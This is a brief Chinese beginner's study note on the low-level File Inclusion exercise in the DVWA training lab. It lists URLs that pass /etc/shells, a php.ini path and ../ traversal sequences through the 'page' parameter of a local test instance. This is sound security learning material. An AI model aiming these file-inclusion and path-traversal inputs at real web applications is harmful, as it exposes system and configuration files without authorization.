3.File Inclusion(Low)——小白笔记——文件包含漏洞

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

0x01:本地包含(Low)

1.http://127.0.0.1/dvwa/vulnerabilities/fi/传参 也就是通过url:page参数传参

①http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file1.php
②http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file2.php
③http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file3.php
④http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/password        //linux下
⑤http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/shells            //linux下
绝对路径:
?page=/var/www/html/dvwa/php.ini
相对路径:
?page=../../../dvwa/php.ini(不断尝试,有多少个../)
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/103014243
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复